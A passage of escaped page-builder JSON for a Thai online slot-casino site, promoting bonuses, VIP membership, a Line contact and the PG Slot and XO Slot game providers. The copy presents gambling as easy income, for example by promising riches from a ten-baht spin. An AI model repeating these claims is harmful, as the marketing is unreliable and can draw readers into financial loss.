\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e08\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07\\u0e25\\u0e47\\u0e2d\\u0e01\\u0e2d\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e23\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e44\\u0e2b\\u0e23\\u0e48 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e01\\u0e35\\u0e48\\u0e23\\u0e2d\\u0e1a \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e43\\u0e19\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e14\\u0e01\\u0e47\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e2b\\u0e21\\u0e14 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e25\\u0e31\\u0e27\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e2b\\u0e21\\u0e14\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e39\\u0e01\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e22\\u0e2d\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e38\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e33\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e15\\u0e49\\u0e2d\\u0e19\\u0e23\\u0e31\\u0e1a \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e04\\u0e37\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e40\\u0e2a\\u0e35\\u0e22 \\u0e23\\u0e27\\u0e21\\u0e16\\u0e36\\u0e07\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e43\\u0e19\\u0e40\\u0e17\\u0e28\\u0e01\\u0e32\\u0e25\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e22\\u0e34\\u0e48\\u0e07\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e41\\u0e15\\u0e49\\u0e21\\u0e41\\u0e25\\u0e01\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e04\\u0e23\\u0e14\\u0e34\\u0e15\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e1e\\u0e23\\u0e35\\u0e40\\u0e21\\u0e35\\u0e22\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19\\u0e40\\u0e23\\u0e35\\u0e22\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ff86a53\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e14\\u0e39\\u0e41\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e41\\u0e1a\\u0e1a VIP \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e40\\u0e2b\\u0e27\\u0e35\\u0e48\\u0e22\\u0e07\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"55e80bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e04\\u0e27\\u0e32\\u0e21\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e22\\u0e04\\u0e19\\u0e2d\\u0e32\\u0e08\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e21\\u0e32\\u0e15\\u0e23\\u0e10\\u0e32\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01 VIP \\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e43\\u0e04\\u0e23 \\u0e22\\u0e34\\u0e48\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e32\\u0e01 \\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e01\\u0e47\\u0e08\\u0e30\\u0e2a\\u0e39\\u0e07\\u0e02\\u0e36\\u0e49\\u0e19\\u0e15\\u0e32\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e2a\\u0e21\\u0e04\\u0e30\\u0e41\\u0e19\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e17\\u0e38\\u0e01\\u0e23\\u0e30\\u0e14\\u0e31\\u0e1a\\u0e08\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27 \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e08\\u0e30\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e08\\u0e49\\u0e32\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e17\\u0e35\\u0e48\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2a\\u0e48\\u0e27\\u0e19\\u0e15\\u0e31\\u0e27 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e23\\u0e32\\u0e22\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e02\\u0e49\\u0e32\\u0e23\\u0e48\\u0e27\\u0e21\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e40\\u0e2d\\u0e47\\u0e01\\u0e0b\\u0e4c\\u0e04\\u0e25\\u0e39\\u0e0b\\u0e35\\u0e1f\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e17\\u0e31\\u0e48\\u0e27\\u0e44\\u0e1b\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49 \\u0e2d\\u0e35\\u0e01\\u0e17\\u0e31\\u0e49\\u0e07\\u0e40\\u0e23\\u0e32\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e34\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e25\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e32\\u0e22 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e41\\u0e0a\\u0e17\\u0e2a\\u0e14\\u0e43\\u0e19\\u0e2b\\u0e19\\u0e49\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a <strong><a href=\\\"http:\\/\\/mgbline.com\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\">Line Official<\\/a><\\/strong> \\u0e41\\u0e25\\u0e30\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e2b\\u0e25\\u0e37\\u0e2d\\u0e1c\\u0e48\\u0e32\\u0e19\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19 \\u0e17\\u0e38\\u0e01\\u0e0a\\u0e48\\u0e2d\\u0e07\\u0e17\\u0e32\\u0e07\\u0e15\\u0e2d\\u0e1a\\u0e01\\u0e25\\u0e31\\u0e1a\\u0e44\\u0e27\\u0e20\\u0e32\\u0e22\\u0e43\\u0e19\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e19\\u0e32\\u0e17\\u0e35 \\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e1b\\u0e23\\u0e30\\u0e08\\u0e33\\u0e15\\u0e25\\u0e2d\\u0e14 24 \\u0e0a\\u0e31\\u0e48\\u0e27\\u0e42\\u0e21\\u0e07 \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e33\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e25\\u0e48\\u0e2d\\u0e22\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e17\\u0e34\\u0e49\\u0e07\\u0e44\\u0e27\\u0e49 \\u0e41\\u0e21\\u0e49\\u0e41\\u0e15\\u0e48\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e22\\u0e31\\u0e07\\u0e44\\u0e21\\u0e48\\u0e04\\u0e38\\u0e49\\u0e19\\u0e01\\u0e31\\u0e1a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e07\\u0e27\\u0e25 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e17\\u0e35\\u0e21\\u0e07\\u0e32\\u0e19\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e41\\u0e19\\u0e30\\u0e19\\u0e33\\u0e17\\u0e38\\u0e01\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19 \\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 \\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19 \\u0e44\\u0e1b\\u0e08\\u0e19\\u0e16\\u0e36\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e37\\u0e2d\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e21\\u0e01\\u0e31\\u0e1a\\u0e07\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e04\\u0e38\\u0e13\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e2d\\u0e32\\u0e0a\\u0e35\\u0e1e<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2cd57df\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e2a\\u0e38\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e19\\u0e48\\u0e32\\u0e25\\u0e2d\\u0e07 \\u0e01\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e04\\u0e48\\u0e2a\\u0e34\\u0e1a\\u0e1a\\u0e32\\u0e17\\u0e01\\u0e47\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\n\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e40\\u0e25\\u0e22\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"49e7be0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19\\u0e27\\u0e48\\u0e32\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e23\\u0e32\\u0e22\\u0e44\\u0e14\\u0e49\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e44\\u0e21\\u0e48\\u0e43\\u0e0a\\u0e48\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e17\\u0e35\\u0e48\\u0e04\\u0e34\\u0e14 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e32\\u0e21\\u0e35\\u0e1e\\u0e31\\u0e19\\u0e18\\u0e21\\u0e34\\u0e15\\u0e23\\u0e17\\u0e35\\u0e48\\u0e08\\u0e30\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e48\\u0e32\\u0e19\\u0e44\\u0e14\\u0e49\\u0e40\\u0e02\\u0e49\\u0e32\\u0e16\\u0e36\\u0e07\\u0e40\\u0e01\\u0e21\\u0e15\\u0e48\\u0e32\\u0e07 \\u0e46 \\u0e01\\u0e48\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e41\\u0e16\\u0e21\\u0e22\\u0e31\\u0e07\\u0e19\\u0e33\\u0e40\\u0e2a\\u0e19\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e40\\u0e25\\u0e48\\u0e19\\u0e2a\\u0e19\\u0e38\\u0e01 \\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e07\\u0e34\\u0e19\\u0e25\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2a\\u0e39\\u0e07\\u0e14\\u0e49\\u0e27\\u0e22 \\u0e42\\u0e14\\u0e22\\u0e21\\u0e35 3 \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e17\\u0e35\\u0e48\\u0e19\\u0e48\\u0e32\\u0e25\\u0e38\\u0e49\\u0e19\\u0e14\\u0e31\\u0e07\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b\\u0e19\\u0e35\\u0e49 <\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ecb961\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d266248\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0ab58bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3><span style=\\\"color: #960c0a;\\\"><b>PG Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e43\\u0e04\\u0e23 \\u0e46 \\u0e01\\u0e47\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e22\\u0e01\\u0e43\\u0e2b\\u0e49 pg Slot \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e20\\u0e32\\u0e1e\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e2a\\u0e27\\u0e22 \\u0e40\\u0e1e\\u0e25\\u0e07\\u0e1b\\u0e23\\u0e30\\u0e01\\u0e2d\\u0e1a\\u0e40\\u0e23\\u0e49\\u0e32\\u0e43\\u0e08 \\u0e41\\u0e25\\u0e30\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e43\\u0e04\\u0e23 \\u0e40\\u0e01\\u0e21\\u0e17\\u0e38\\u0e01\\u0e40\\u0e01\\u0e21\\u0e08\\u0e32\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e2d\\u0e2d\\u0e01\\u0e41\\u0e1a\\u0e1a\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e41\\u0e15\\u0e48\\u0e21\\u0e35\\u0e23\\u0e32\\u0e22\\u0e25\\u0e30\\u0e40\\u0e2d\\u0e35\\u0e22\\u0e14\\u0e25\\u0e36\\u0e01\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e27\\u0e32\\u0e07\\u0e01\\u0e25\\u0e22\\u0e38\\u0e17\\u0e18\\u0e4c\\u0e43\\u0e19\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07 pg Slot \\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e38\\u0e1b\\u0e01\\u0e23\\u0e13\\u0e4c \\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21\\u0e1e\\u0e34\\u0e27\\u0e40\\u0e15\\u0e2d\\u0e23\\u0e4c \\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e14\\u0e32\\u0e27\\u0e19\\u0e4c\\u0e42\\u0e2b\\u0e25\\u0e14\\u0e41\\u0e2d\\u0e1b\\u0e1e\\u0e25\\u0e34\\u0e40\\u0e04\\u0e0a\\u0e31\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01 \\u0e19\\u0e2d\\u0e01\\u0e08\\u0e32\\u0e01\\u0e19\\u0e35\\u0e49\\u0e22\\u0e31\\u0e07\\u0e21\\u0e35\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e17\\u0e38\\u0e01\\u0e40\\u0e14\\u0e37\\u0e2d\\u0e19 \\u0e40\\u0e0a\\u0e48\\u0e19 Mahjong Ways, Lucky Neko, \\u0e2b\\u0e23\\u0e37\\u0e2d Treasures of Aztec \\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e31\\u0e19\\u0e15\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2e\\u0e2d\\u0e15\\u0e17\\u0e38\\u0e01\\u0e07\\u0e27\\u0e14 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e17\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e41\\u0e19\\u0e27\\u0e40\\u0e01\\u0e21\\u0e01\\u0e23\\u0e32\\u0e1f\\u0e34\\u0e01\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35 \\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e21\\u0e34\\u0e19\\u0e34\\u0e21\\u0e2d\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e1e\\u0e25\\u0e34\\u0e19 \\u0e46 \\u0e23\\u0e31\\u0e1a\\u0e23\\u0e2d\\u0e07\\u0e27\\u0e48\\u0e32 pg Slot \\u0e04\\u0e37\\u0e2d\\u0e04\\u0e33\\u0e15\\u0e2d\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e15\\u0e34\\u0e14\\u0e43\\u0e08\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e41\\u0e23\\u0e01\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19<\\/span><\\/p><h3><span style=\\\"color: #960c0a;\\\"><b>XO Slot<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">\\u0e2d\\u0e35\\u0e01\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e15\\u0e33\\u0e19\\u0e32\\u0e19\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e17\\u0e35\\u0e48\\u0e04\\u0e2d\\u0e40\\u0e01\\u0e21\\u0e23\\u0e38\\u0e48\\u0e19\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e22\\u0e31\\u0e07\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e44\\u0e21\\u0e48\\u0e02\\u0e32\\u0e14\\u0e1b\\u0e32\\u0e01\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d XO Slot \\u0e04\\u0e48\\u0e32\\u0e22\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e38\\u0e14\\u0e04\\u0e25\\u0e32\\u0e2a\\u0e2a\\u0e34\\u0e01\\u0e17\\u0e35\\u0e48\\u0e04\\u0e23\\u0e2d\\u0e07\\u0e43\\u0e08\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e21\\u0e32\\u0e19\\u0e32\\u0e19 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e48\\u0e2d\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e22\\u0e31\\u0e07\\u0e04\\u0e07\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e43\\u0e19\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e14\\u0e31\\u0e49\\u0e07\\u0e40\\u0e14\\u0e34\\u0e21\\u0e44\\u0e27\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e16\\u0e49\\u0e27\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07 XO Slot 